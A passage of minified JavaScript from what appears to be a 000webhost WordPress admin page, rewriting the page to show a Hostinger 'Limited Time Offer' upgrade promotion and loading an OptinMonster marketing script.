6px;}",style=document.createElement("style"),sheet=window.document.styleSheets[0];style.styleSheet?style.styleSheet.cssText=css:style.appendChild(document.createTextNode(css)),document.getElementsByTagName("head")[0].appendChild(style),document.getElementsByTagName("head")[0].appendChild(googleFont);var button=document.getElementsByClassName("upgrade_button_red")[0],link=button.parentElement;link.setAttribute("href","https://www.hostinger.com/hosting-starter-offer?utm_source=000webhost&utm_medium=panel&utm_campaign=000-wp"),link.innerHTML='<button class="upgrade_button_red_sale">Upgrade Now</button>',(notification=notification[0]).setAttribute("style","background-color: #f8f8f8; border-left-color: #6747c7 !important;"),notification.className="notice notice-error is-dismissible";var mainContentHolder=document.getElementById("main_content");mainContentHolder.setAttribute("style","padding: 0;"),hostingerLogo[0].remove();var h1Tag=notification.getElementsByTagName("H1")[0];h1Tag.className="000-h1",h1Tag.innerHTML="Limited Time Offer",h1Tag.setAttribute("style","color: #32454c;  margin-top: 48px; font-size: 48px; font-weight: 700;");var h2Tag=document.createElement("H2");h2Tag.innerHTML="From $0.79/month",h2Tag.setAttribute("style","color: #32454c; margin: 20px 0 45px 0; font-size: 48px; font-weight: 700;"),h1Tag.parentNode.insertBefore(h2Tag,h1Tag.nextSibling);var paragraph=notification.getElementsByTagName("p")[0];paragraph.innerHTML="Don’t miss the opportunity to enjoy up to <strong>4x WordPress Speed, Free SSL and all premium features</strong> available for a fraction of the price!",paragraph.setAttribute("style",'font-family: "Roboto", sans-serif; font-size: 18px; font-weight: 300; color: #6f7c81; margin-bottom: 20px;');var list=notification.getElementsByTagName("UL")[0];list.remove();var org_html=mainContent.innerHTML,new_html='<div class="content-wrapper">'+mainContent.innerHTML+'</div><div class="web-hosting-90-off-image-wrapper"><img class="web-hosting-90-off-image" src="https://cdn.000webhost.com/000webhost/promotions/wp-inject-default-img.png"></div>';mainContent.innerHTML=new_html;var saleImage=mainContent.getElementsByClassName("web-hosting-90-off-image")[0];wpSidebar.insertAdjacentHTML("beforeend",'<a href="https://www.hostinger.com/hosting-starter-offer?utm_source=000webhost&amp;utm_medium=panel&amp;utm_campaign=000-wp-sidebar" target="_blank" class="upgrade-btn-sidebar"><span class="dashicons dashicons-star-filled upgrade-btn-sidebar__icon"></span><span class="upgrade-btn-sidebar__text">Upgrade</span></a>'),wpTopBarRight.insertAdjacentHTML("beforebegin",'<a class="top-bar-upgrade-btn" href="https://www.hostinger.com/hosting-starter-offer?utm_source=000webhost&amp;utm_medium=panel&amp;utm_campaign=000-wp-top-bar" target="_blank"><span class="ab-icon dashicons-before dashicons-star-filled top-bar-upgrade-btn__icon"></span><span class="top-bar-upgrade-btn__text">Go Premium</span></a>')}</script><script type="text/javascript" src="https://a.opmnstr.com/app/js/api.min.js" data-campaign="f6brbmuxflyqoriatchv" data-user="71036" async></script></body>
</html>

